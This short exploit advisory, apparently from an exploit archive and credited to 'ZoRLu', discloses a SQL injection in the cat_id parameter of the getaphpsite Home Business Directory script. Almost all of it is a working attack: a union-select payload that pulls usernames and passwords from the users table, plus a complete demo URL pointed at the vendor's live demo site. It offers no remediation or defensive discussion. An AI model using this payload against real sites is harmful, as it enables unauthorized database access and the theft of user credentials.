getaphpsite Home Business Directory (cat_id) Remote Sql inj

getaphpsite Home Business Directory (cat_id) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/homebusiness-sql.txt

link: http://www.exploiter5.com/all.php?id=63

Discovered By: ZoRLu

Exploit:

http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL]

[SQL]=

0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users

for demo:

http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users